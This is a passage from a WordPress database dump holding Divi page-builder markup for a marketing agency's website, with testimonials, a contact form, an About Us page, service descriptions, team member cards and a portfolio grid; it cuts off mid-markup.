them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2021-03-22 11:52:41','2021-03-22 11:52:41','',134,'https://wthtest1.in8.cdn-alpha.com/?p=792',0,'revision','',0),(796,1,'2021-03-22 12:01:18','2021-03-22 12:01:18','','Whatthehell','','inherit','open','closed','','bitmap-1','','','2021-03-22 12:01:53','2021-03-22 12:01:53','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2021/03/Bitmap-1.png',0,'attachment','image/png',0),(797,1,'2021-03-22 12:02:48','2021-03-22 12:02:48','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"4.5.6\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"20px|0px|0px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"\" content_last_edited=\"on|phone\" _builder_version=\"4.5.6\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"9px\" text_font_size_last_edited=\"on|phone\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.6\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||56px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.6\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"Dhiraj\" title_text=\"Founder WhatTheHell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-7.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" 